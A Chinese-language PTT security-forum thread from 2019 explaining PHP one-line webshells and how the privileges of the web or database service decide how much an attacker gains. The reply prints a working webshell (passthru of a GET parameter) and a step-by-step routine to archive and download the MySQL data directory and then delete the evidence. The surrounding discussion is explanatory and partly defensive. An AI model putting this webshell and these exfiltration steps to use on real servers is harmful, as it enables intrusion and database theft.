作者asimon (逞˙強)
看板NetSecurity
標題Re: [問題] 一句話木馬
時間Sun May 26 04:20:35 2019
<恕刪>
: → newnovice: 請教st大 所以這個w算是拿到os的root shell嗎? 也能執 05/24 23:03
: → newnovice: 行任何資料庫的撈取? 05/24 23:03
: 推 st1009: 嗯,沒意見,應該是可以轉,晚點轉轉 05/24 23:25
: → st1009: 這個w有沒有取得root權限要看被注入木馬的檔案本身的權限 05/24 23:26
: → st1009: ,一般而言,普通的檔案是不會有root權限的,如果操作正常 05/24 23:27
: → st1009: ...我是有聽說過有不少人沒事就給PHPmyadmin root 然後被 05/24 23:27
: → st1009: 人用這個REC時就Q了XDDD 05/24 23:27
: → st1009: 以PHP為例,通常沒有意外的話,一個PHP是可以撈取DB,如果 05/24 23:28
: → st1009: 沒有特別控管是可以執行任何資料庫的撈取沒錯 05/24 23:29
: → st1009: 不過專業點的會把DB分段,這時就只能撈有權限的那段了 05/24 23:30
: ※ st1009:轉錄至看板 CyberSecure 05/24 23:31
: 推 st1009: 是說我有些用詞沒有很精確,不要太在意>"< 05/24 23:35
: 推 asimon: 樓上怪怪的.. 該說執行木馬者的執行權限吧? 05/26 03:36
: → asimon: 雖然備注入木馬的.php是ooxx:ooxx但如果apache是root執行, 05/26 03:37
: → asimon: 還是會拿到root權限.. 同樣的, 如果從mysql執行系統指令, 05/26 03:37
: → asimon: 看的就是mysql的服務是誰啟動的, 如果用appserv, 全部跑 05/26 03:37
: → asimon: administrator當然就... ((請自行想像.. 05/26 03:38
: 推 asimon: 然後樓上提到拿到一句話的權限是否能不能撈DB.. 05/26 03:40
: → asimon: 如果DB另外有設密碼, 就要另外破密碼.. 05/26 03:40
: → asimon: 回文好了.. 05/26 03:41
從這邊開始說好了..
首先, 一句話木馬其實是掛網馬的一個特例..
什麼是掛網馬? 簡單說就是惡意攻擊者想辦法在受害者的網頁上嵌入一個網頁型木馬..
這邊又多了一個名詞, 網頁型木馬?
就是可以讓非管理者做一些本來只有管理者能做的事情..
例如:
1) R: 讀目錄列表或檔案 網頁根目錄下 或 系統路徑
2) W: 寫入東西, 修改東西 一樣可分網頁根目錄下 或 系統路徑
3) X: 執行東西, 一樣可分網頁根目錄下 或 系統路徑
而一句話木馬表示這隻網頁型木馬只有一行字...
至於影響多嚴重就看權限問題了..
如果我們在M$家族, 常常都是看到Administrators打天下..
爽了, 得了Administrators就等於得天下..
在Linux下, 看RWX的權限, 我們通常知道, UN*X下面沒意外沒有Chroot的話,
大家通常都是可以看大部分檔案的(除了home / root / shadow等少數特定地方外)..
所以如果很多時候, 如果有辦法在web根目錄掛一隻網馬, 通常離破台不遠了..
怎麼這麼說呢? 我們還是以php為例,
今天如果看到目標網站上有可以掛馬的弱點,
常常是可以在某網頁上寫入任意字元, 且寫了<? ... ?> 標籤後可以執行..
我們常常有兩種做法:
1) 比較搞剛的做法:
塞一個php上傳器上去(反正找php上傳檔案很多範例),
接著利用這個上傳器上傳一個完整的網頁型木馬,
這樣上去的木馬就有超級多功能了,
以下是我看過可以在php網頁做到的:
檔案總管 / 工作管理員 / CMD / 上傳下載器 .. 這些都很普遍的了 ..
阿最後就用檔案總館去看看要怎麼挖mysql這樣..
後來, 傳兩次馬很麻煩, 我們也懶得拿多拿肉雞,
反正掛了馬還是要自己擦屁股, 這麼搞剛沒啥意思..
因此我們後來都用懶惰的作法..
2) 比較懶惰的作法:
一招闖天下, 只要確定以下項目: 1. 可以讀寫檔 2. 可以執行指令 就夠了..
我們常確定可以讀寫檔又可以執行指令後,
就重複用一句話指令做一些事情, 拿到整個db就結束..
以下沒有參考紀錄, 是憑空打的懶得加跳脫字元, 看得懂就好:
首先寫入網馬如 <? passthru($_GET[cmd]); ?> 到某個php
a) tree / |grep mysql (拿到mysql家目錄路徑
b) tar -zcvf /[上面看到的路徑]/mysql ./mysql.tar.gz
c) 下載
http://[網頁路徑]/mysql.tar.gz
d) rm ./mysql.tar.gz ; rm ooxx.php
直接把整個db路徑打包下載順便擦屁股,
好幾個願望一次滿足, 當然mysql可以換成任意想得到的關鍵字.. 結案 xDa
從這裡知道, 被掛馬是件很麻煩很嚴重的事!
因為如果可以被掛馬, 搞不好每個角落都被看光了,
更慘的搞不好不知道被藏了多少馬這樣..
大概就是這個狀況, 提供大家參考..
聽說這是騙P幣 xD
Best Regards,
by ASimon
--
※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 140.134.25.104
※ 文章網址: https://webptt.com/m.aspx?n=bbs/NetSecurity/M.1558815638.A.419.html
1F:→ asimon: 才發現這是這邊版的首PO, 我其實很低調的, 多多指教~! 0_0 05/26 04:21
2F:推 hpyhacking: 請問掛馬的方式是像XSS那樣例如說留言板還是什麼之類 05/26 11:06
3F:→ hpyhacking: 的嗎 05/26 11:06
4F:→ asimon: 這是其中一種方法.. 只要掛得上去的都可以.. 05/26 13:11
5F:→ asimon: 反正只要達到最終目標: 在網頁上寫入可以讓攻擊者執行 05/26 13:12
6F:→ asimon: 額外程式的程式碼就是了.. 05/26 13:13
※ 編輯: asimon (140.134.25.104), 05/26/2019 13:16:53
7F:推 st1009: 要用php一句話的話,基本上都是寫進去的,不會用xss,倒是 05/27 17:14
8F:→ st1009: 可能用Sql injection讓phpmyadmin去寫,所以沒事時那個要 05/27 17:14
9F:→ st1009: 關掉比較好 05/27 17:14
10F:→ st1009: 其實大佬告訴我不要用phpmyadmin但他真的太好用了... 05/27 17:14
11F:→ asimon: 早年還是有看到在留言板寫的.. 算xss嗎? O_o 05/27 18:28
12F:推 CMJ0121: XSS 應該還是偏 JavaScript 當作進入點 05/27 20:58
13F:推 st1009: 應該是儲存型的XSS,但是功能相對較低,比較好的作法是進 05/27 21:45
14F:→ st1009: 行網頁釣魚,或者偷token 05/27 21:45